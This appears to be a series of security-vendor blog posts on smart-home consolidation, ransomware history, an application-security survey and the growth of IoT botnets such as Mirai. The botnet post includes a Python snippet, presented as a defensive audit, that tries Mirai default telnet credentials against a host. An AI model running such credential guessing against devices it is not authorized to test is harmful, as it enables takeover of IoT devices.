In 2003, I went to Zermatt, Switzerland to go snowboarding under the Matterhorn. We had an eclectic group of people from all over the world. Some of us were enthusiasts, some ski patrol or medics, and a few were backcountry avalanche trained. Because of this, we had a lot of different gear with us, including ice saws, shovels, probes, avalanche beacons, radios, etc. In addition to that gear, we also brought cameras, cell phones, MP3 players and, of course, large battery charger bays with international inverters/adapters to keep everything going. I had a backpack with all the avalanche and snow testing gear. In my jacket, I carried an avalanche beacon, digital camera, flip cell phone, family radio with a long external mic, GPS, and an MP3 player with headphones. I felt like I was Batman with all the gear crammed all over the place. I told one of my friends on the trip that one day all of this technology would be consolidated into one device: radio, phone, camera, MP3 player, and avalanche beacon. My friends thought I was crazy and that it would never happen. Fast forward to the smartphone, where we now have it all, with the exception of the avalanche beacon, in one device.

To think that many of us had these "point solutions" in our personal tech, and that it's now all consolidated into one device, makes me wonder: when will we consolidate at home?

The future of the smart home

I have a Zigbee bridge for my lights, a Zigbee bridge for my blinds, 5 smart speakers, solar panels on the blinds (to charge them and get heat/sunlight measures), smart smoke detectors, smart locks, IP cameras, a smart watering system for the plants, smart lights, a smart alarm, a UTM firewall, WiFi mesh, etc. These are all point solutions. Some of them are really neat and probably should stay point solutions, but what if the technology companies of today were to start thinking about consolidating and adding security into the mix?

[You might also like: Cities Paying Ransom: What Does It Mean for Taxpayers?]

I've started to look at upgrading my home WiFi network, as my smart TV and smart streaming box are now struggling to play streaming movies. After looking at some of the new consumer-level WiFi mesh solutions, they show a lot of promise. One of the vendors I'm considering offers not only an easy-to-set-up WiFi mesh, but also automatic channel changing across WiFi radio frequencies to find the fastest radio, as well as automatically moving devices between access points. One of them offers VPN services as well as anti-virus and content filtering (keeping you safe from malicious websites), and gives out tokens for guests while keeping them on their own network. This all looks great, but I started to think back to Zermatt, Switzerland.

What if the smart home speaker manufacturers wanted to really capture the market? What if you could get a smart speaker that had a WiFi mesh access point, a Zigbee/Z-Wave access point (for lights, controllers, etc.) and cloud-based security features in it? If I could drop a new smart speaker in any room, set it up in 3-5 minutes and have it join my wireless mesh network, it could cover a lot of territory quickly. If one of them were the base unit that plugged into the internet router, it could be the main interface for security: take all the device groups and suggest security policies to keep them from talking to things they shouldn't (the cameras, for example, should never talk to the smart watering controller). What if it could look for IoT threats that spread internally, as well as connections to malware command-and-control servers?

Security should be a priority

The security that could easily be offered and bundled across this platform includes things like VPN (both to and from the home network), which would let you browse safely while using public WiFi. You could also access home devices that may not be very secure from the manufacturer, like IP cameras and DVRs, without having to expose them to the world. Cloud-based security offerings could look for malware infections and requests to botnet command-and-control servers. Then, layers like intrusion prevention and active WiFi defense could help detect hackers aiming to get onto the network and do harm. Finally, putting all of these offerings into a single pane of glass for visibility would definitely be attractive to end customers.

Granted, I know this could put the point-solution providers in a position where their WiFi solutions and home routers become less valuable to the mainstream. But what if we got better antivirus and IoT protection? I can only dream of the day that we as consumers are able to consolidate all of our home networks into a real smart-home solution. In the enterprise IT market, Unified Threat Management platforms have gained popularity: firewalls that do intrusion prevention, wireless intrusion prevention, inline antivirus, content filtering, and guest networks. I think the next logical step is to see all of these features consolidated into the next generation of smart home speakers. How long will it take to see this become reality? I don't know. Will people think this idea is crazy? Probably.

Update: At the time of writing this, one of the smart home speaker manufacturers has announced a new smart home speaker line that will actually include a smart home hub in the speaker. Nothing has been said as to whether it provides any security features.

Read “Radware’s 2018 Web Application Security Report” to learn more.

The Origin of Ransomware and Its Impact on Businesses

October 4, 2018 — by Fabio Palozza

In previous articles we've mentioned how ransomware has wreaked havoc, invading systems and putting organizations' reputation and stability at stake. In this article, we'll start with the basics and describe what ransomware is and how cybercriminals use it to attack tens of thousands of systems by taking advantage of system vulnerabilities.

[You might also like: Top Cryptomining Malware. Top Ransomware]

Ransomware is defined as a form of malicious software designed to restrict users from accessing their computers, or the files stored on them, until they pay a ransom to cybercriminals. Ransomware typically operates via cryptovirology mechanisms, using symmetric as well as asymmetric encryption to prevent users from performing managed file transfer or accessing particular files or directories. Cybercriminals use ransomware to lock files, betting that those files hold information crucial enough that users will be compelled to pay the ransom in order to regain access.

The History

It's been said that ransomware was introduced as the AIDS Trojan in 1989, when Harvard-educated biologist Joseph L. Popp sent 20,000 compromised diskettes named "AIDS Information – Introductory Diskettes" to attendees of the World Health Organization's international AIDS conference. The Trojan worked by encrypting the file names on the victims' computers and hiding directories. The victims were asked to pay $189 to PC Cyborg Corp. at a mailbox in Panama.

From 2006 onward, cybercriminals became more active and started using asymmetric RSA encryption. They launched the Archiveus Trojan, which encrypted the files of the My Documents directory. Victims were promised access to the 30-digit password only if they made a purchase from an online pharmacy.

After 2012, ransomware started spreading worldwide, infecting systems and transforming into more sophisticated forms to enable easier attack delivery as the years rolled by. In Q3 of 2011, about 60,000 new ransomware samples were discovered, a number that grew to over 200,000 in Q3 of 2012.

The first version of CryptoLocker appeared in September 2013 and the first copycat software called Locker was introduced in December of that year.

Ransomware has been creatively defined by the U.S. Department of Justice as a new model of cybercrime with the potential to cause impacts on a global scale. Stats indicate that the use of ransomware is on a steady rise, and according to Veeam, businesses had to pay $11.7 on average in 2017 due to ransomware attacks. Alarmingly, annual ransomware-induced costs, including the ransoms and the damages caused by the attacks, are likely to shoot beyond $11.5 billion by 2019.

The Business Impacts can be worrisome

Ransomware can cause tremendous impacts that can disrupt business operations and lead to data loss. The impacts of ransomware attacks include:

  • Loss or destruction of crucial information
  • Business downtime
  • Productivity loss
  • Business disruption in the post-attack period
  • Damage of hostage systems, data, and files
  • Loss of reputation of the victimized company

You may be surprised to learn that, apart from the ransom itself, the cost of downtime due to restricted system access can bring major consequences. As a matter of fact, losses due to downtime may run to tens of thousands of dollars daily.

As ransomware continues to become more widespread, companies will need to revise their annual cybersecurity goals, focus on the appropriate implementation of ransomware resilience and recovery plans, and commit adequate funds for cybersecurity resources in their IT budgets.

Read “Consumer Sentiments: Cybersecurity, Personal Data and The Impact on Customer Loyalty” to learn more.

Are Your Applications Secure?

October 3, 2018 — by Ben Zilberman

Executives express mixed feelings and a surprisingly high level of confidence in Radware’s 2018 Web Application Security Report. 

As we close out a year of headline-grabbing data breaches (British Airways, Under Armour, Panera Bread), the introduction of GDPR and the emergence of new application development architectures and frameworks, Radware examined the state of application security in its latest report. This global survey among executives and IT professionals yielded insights about threats, concerns and application security strategies.

The common trend across a variety of application security challenges, including data breaches, bot management, DDoS mitigation, API security and DevSecOps, was the high level of confidence reported by those surveyed: 90% of all respondents across regions reported confidence that their security model is effective at mitigating web application attacks.

Attacks against applications are at a record high and sensitive data is shared more than ever. So how can execs and IT pros have such confidence in the security of their applications?

To get a better understanding, we researched the current threat landscape and application protection strategies organizations currently take. Contradicting evidence stood out immediately:

  • 90% suffered attacks against their applications
  • One in three shared sensitive data with third parties
  • 33% allowed third parties to create/modify/delete data via APIs
  • 67% believed a hacker can penetrate their network
  • 89% saw web-scraping as a significant threat to their IP
  • 83% run bug bounty programs to find vulnerabilities they miss

There were quite a few threats to application services that were not properly addressed, challenging traditional security approaches. In parallel, the adoption of emerging frameworks and architectures, which rely on numerous integrations with multiple services, adds more complexity and increases the attack surface.

Current Threat Landscape

Last November, OWASP released a new list of top 10 vulnerabilities in web applications. Hackers continue to use injections, XSS, and a few old techniques such as CSRF, RFI/LFI and session hijacking to exploit these vulnerabilities and gain unauthorized access to sensitive information. Protection is becoming more complex as attacks come through trusted sources such as a CDN, encrypted traffic, or APIs of systems and services we integrate with. Bots behave like real users and bypass challenges such as CAPTCHA, IP-based detection and others, making it even harder to secure and optimize the user experience.

[You might also like: WAFs Should Do A  Lot More Against Current Threats Than Covering OWASP Top 10]

Web application security solutions must be smarter and address a broad spectrum of vulnerability exploitation scenarios. On top of protecting the application from these common vulnerabilities, a solution has to protect APIs, mitigate DoS attacks, manage bot traffic and distinguish between legitimate bots (search engines, for instance) and bad ones like botnets and web-scrapers.

DDoS Attacks

63% suffered a denial-of-service attack against their application. DoS attacks render applications inoperable by exhausting the application's resources. Buffer overflows and HTTP floods were the most common types of DoS attacks, and this form of attack is more common in APAC. 36% find HTTP/Layer-7 DDoS the most difficult attack to mitigate. Half of the organizations take rate-based approaches (such as limiting the number of requests from a certain source, or simply buying a rate-based DDoS protection solution), which are ineffective once the threshold is exceeded and real users can't connect.

API Attacks

APIs simplify the architecture and delivery of application services and make digital interactions possible. Unfortunately, they also introduce a wide range of risks and vulnerabilities, serving as a backdoor for hackers to break into networks. Through APIs, data is exchanged over HTTP, where both parties receive, process and share information. A third party is theoretically able to insert, modify, delete and retrieve content from applications. This is nothing but an invitation to attack:

  • 62% of respondents did not encrypt data sent via API
  • 70% of respondents did not require authentication
  • 33% allowed third parties to perform actions (GET/ POST / PUT/ DELETE)

Attacks against APIs:

  • 39% Access violations
  • 32% Brute-force
  • 29% Irregular JSON/XML expressions
  • 38% Protocol attacks
  • 31% Denial of service
  • 29% Injections

Bot Attacks

The amount of both good and bad bot traffic is growing. Organizations are forced to increase network capacity and need to be able to precisely tell friend from foe so that both customer experience and security are maintained. Surprisingly, 98% claimed they can make such a distinction. However, a similar share sees web-scraping as a significant threat, and 87% were impacted by such an attack over the past 12 months, despite the variety of methods companies use to overcome the challenge: CAPTCHA, in-session termination, IP-based detection or even buying a dedicated anti-bot solution.

Impact of Web-scraping:

  • 50% gathered pricing information
  • 43% copied website
  • 42% theft of intellectual property
  • 37% inventory queued/being held by bots
  • 34% inventory held
  • 26% inventory bought out

Data Breaches

Multinational organizations keep close tabs on what kinds of data they collect and share. However, almost every other business (46%) reports having suffered a breach. On average, an organization suffers 16.5 breach attempts every year. Most breaches (85%) take between hours and days to discover. In the eyes of our survey respondents, data breaches are the most difficult attack to detect, as well as to mitigate.

How do organizations discover data breaches?

  • 69% Anomaly detection tools/SIEM
  • 51% Darknet monitoring service
  • 45% Information was leaked publicly
  • 27% Ransom demand

IMPACT OF ATTACKS

Negative consequences, such as loss of reputation, customer compensation, legal action (more common in EMEA), churn (more common in APAC), stock price drops (more common in AMER) and executives losing their jobs, are quick to follow a successful attack, while the process of repairing the damage to a company's reputation is long and not always successful. About half admitted having encountered such consequences.

Securing Emerging Application Development Frameworks

The rapidly growing number of applications and their distribution across multiple environments require constant adjustments, which lead to variations every time the application changes. It is nearly impossible to deploy and maintain the same security policy efficiently across all environments. Our research shows that roughly 60% of all applications undergo changes on a weekly basis. How can the security team keep up?

While 93% of organizations use a web application firewall (WAF), only three in ten use a WAF that combines both positive and negative security models for effective application protection.

Technologies Used By DevOps

  • 63% – DevOps and Automation Tools
  • 48% – Containers (3 in 5 use Orchestration)
  • 44% – Serverless / FaaS
  • 37% – Microservices

Among the respondents that use microservices, one-half rated data protection as the biggest challenge, followed by availability assurance, policy enforcement, authentication and visibility.

Summary

Is there a notion that organizations are confident? Yes. Is that a false sense of security? Yes. Attacks are constantly evolving, and security measures are not foolproof. Having application security tools and processes in place may provide a sense of control, but they are likely to be breached or bypassed sooner or later. Another question we are left with is whether senior management is fully aware of the day-to-day incidents. Rightfully so, they look to their internal teams tasked with application security to manage the issue, but there seems to be a disconnect between their perception of the effectiveness of their organizations' application security strategies and the actual exposure to risk.

Read “Radware’s 2018 Web Application Security Report” to learn more.

IoT Botnets on the Rise

October 2, 2018 — by Daniel Smith

Over the last two years, the criminal community has shifted its focus away from exploit kits as a means of payload delivery and begun focusing on exploiting IoT devices for the purpose of botnet development.

Botnets are all the rage and have become more advanced than in the days of Sub7 and Pretty Park. They possess the capability to target multiple devices on different architectures and infect them with a diverse range of payloads. But why are exploit kits falling out of favor, and where is the evolution of botnets going?

Exploit kits in general are prepackaged toolkits that focus on compromising a device with a specific set of exploits. Typically, a victim is directed in a number of different ways to an attack page, where the exploit kit will target an application in the browser such as Adobe Flash, Java or Silverlight. Once the victim is compromised, the exploit kit will drop and run a malicious payload on the targeted machine. What that payload is depends on the criminal or the person leasing the exploit kit for the day, but today they are mainly used to distribute ransomware or crypto-mining payloads.

Exploit kits, once a popular avenue of attack, are now barely used due to the popularity of other attack vectors. Another major reason for the decrease in exploit kit activity is authors abandoning their projects. But why did they abandon them? Many experts would agree that this was the result of updated browser security and the limited availability of the undisclosed exploits needed to keep the kits current.

Unlike IoT devices, Adobe and Java products tend to be patched as soon as the vendors become aware of a problem. This is a major challenge for criminals and one that involves a lot of effort and research on their behalf. So the attacker is left with a choice: invest time and research into an undiscovered exploit, or target devices that are rarely maintained, patched or updated.

Enter: The IoT Botnet

Today, modern botnets are mainly comprised of infected IoT devices such as cameras, routers, DVRs, wearables and other embedded technologies. The evolution of the botnet landscape highlights the security risk posed by millions of Internet-connected devices configured with default credentials or made by manufacturers who won't issue updates. Because of this, hackers can build enormous botnets consisting of a wide variety of devices and architectures.

In comparison to web browsers, IoT devices ship with poor security features such as open ports and default credentials. They are also poorly maintained and hardly ever receive updates. The process of capturing devices for a botnet is a fairly simple, mostly automated task. Hackers typically compromise these devices via brute-force login. They have also recently evolved to inject exploits via open ports to compromise devices, typically leveraging these exploits soon after a researcher discloses a vulnerability.

Overall, it is an automated process in which a bot scans the internet to identify potential targets and sends that information back to a reporting process. If a match is found, the device is exploited with an injection exploit and a malicious payload is downloaded to the device. The payloads downloaded today can vary, but they mainly give the bot-herder the ability to remotely control the infected device, just like a traditional PC botnet.

IoT botnets continue to evolve and are becoming more versatile. It wasn't long ago that Mirai reached the 1Tbps mark, and the process by which it was done has since improved, leading many of us in the industry to worry about the next super attack.

[You might also like: The Evolution of IoT Attacks]

Mirai was simply a botnet comprised of infected IoT devices whose telnet port was left open, utilizing 61 default credentials found on popular devices. Because the port was left open to the world and users didn't change their passwords, the attacker was able to capture a large number of exposed devices.
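
For defenders, the same weakness is easy to audit on networks you are authorized to test: probe your own devices for open telnet and factory credentials, as in this hedged sketch (only a small sample of Mirai's credential list is shown; telnetlib ships with Python up to 3.12):

```python
# Audit a host you own for the exposure Mirai abused: open telnet plus
# unchanged factory credentials. Run only against authorized targets.
import telnetlib

DEFAULT_CREDS = [("root", "xc3511"), ("admin", "admin"), ("root", "default")]

def accepts_default_creds(host, timeout=5):
    for user, password in DEFAULT_CREDS:
        try:
            tn = telnetlib.Telnet(host, 23, timeout)
            tn.read_until(b"login: ", timeout)
            tn.write(user.encode() + b"\n")
            tn.read_until(b"Password: ", timeout)
            tn.write(password.encode() + b"\n")
            banner = tn.read_until(b"#", timeout)   # crude heuristic: shell prompt
            tn.close()
            if b"#" in banner or b"$" in banner:
                return (user, password)             # device is exposed
        except OSError:
            return None   # port closed or host unreachable: not exposed via telnet
    return None
```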

Before Mirai's success, there were Gafgyt and Aidra, both IoT botnets as well. They spread by infecting vulnerable routers with default credentials, and they were successful; in fact, Gafgyt still continues to move in lockstep with Mirai. However, after the publication of the Mirai source code, the field became oversaturated, and bot-herders started incorporating patches to prevent other malware and herders from infecting their captured devices. This change forced herders to look for new ways of capturing devices.

Shortly after, new Mirai variants started appearing. This time, instead of using default credentials, they started incorporating exploits to target vulnerable devices. The attacker known as Best Buy used a modified variant that leveraged the TR-069 RCE exploit in an attempt to infect hundreds of thousands of Deutsche Telekom routers. Following Best Buy, IoT Reaper appeared with borrowed code from Mirai, but this time with the addition of a LUA execution environment so that more complex exploits could be leveraged to enslave devices. As a result, IoT Reaper came loaded with nine exploits.

Hajime was not as elaborate as IoT Reaper, but it did combine the default credentials found in the original Mirai sample with the TR-069 exploit leveraged by Best Buy. The Omni botnet, another variant of Mirai, was found to contain two new exploits targeting Dasan GPON routers. Just recently, a Mirai sample was discovered that contained 16 exploits, including the Apache Struts vulnerability used against Equifax, while the newest variant of Gafgyt was found to contain an exploit targeting SonicWall's Global Management System.

[You might also like: Defending Against the Mirai Botnet]

These two recent discoveries highlight a major change in targeting strategy: a shift from consumer devices to unprotected and rarely updated enterprise devices, putting more pressure on the industry to ensure devices are updated in a timely manner.

Today we see botnet development filling the void left by exploit kits as botnets incorporate more attack vectors and exploits into their deployments. Keep in mind that it's not just about the number of exploits; it also has to do with the speed at which exploitation occurs in the wild.

One of the main reasons we are seeing exploit kits fall out of favor is the improved browser security and the speed at which the industry patches vulnerabilities targeting Flash, Java and Silverlight. This is not seen in the IoT botnet world, where vulnerabilities are rarely patched.

At the end of the day, cybercriminals follow the money by taking the path of least resistance. Over the last several years, exploit kits have come to be seen as high maintenance and hard to keep current due to improved security practices and the diminishing availability of private exploits.

We are also seeing cybercriminals looking to maximize their efforts and infection rates by targeting insecure or unmaintained IoT devices with a wide variety of payloads, ranging from crypto mining and ransomware to denial of service and fraud.

In recent months, we have also seen a handful of botnets targeting enterprise devices, which indicates an intention to move from consumer devices to enterprise devices that are poorly maintained and rarely updated.

Read: “When the Bots Come Marching In, a Closer Look at Evolving Threats from Botnets, Web Scraping & IoT Zombies”
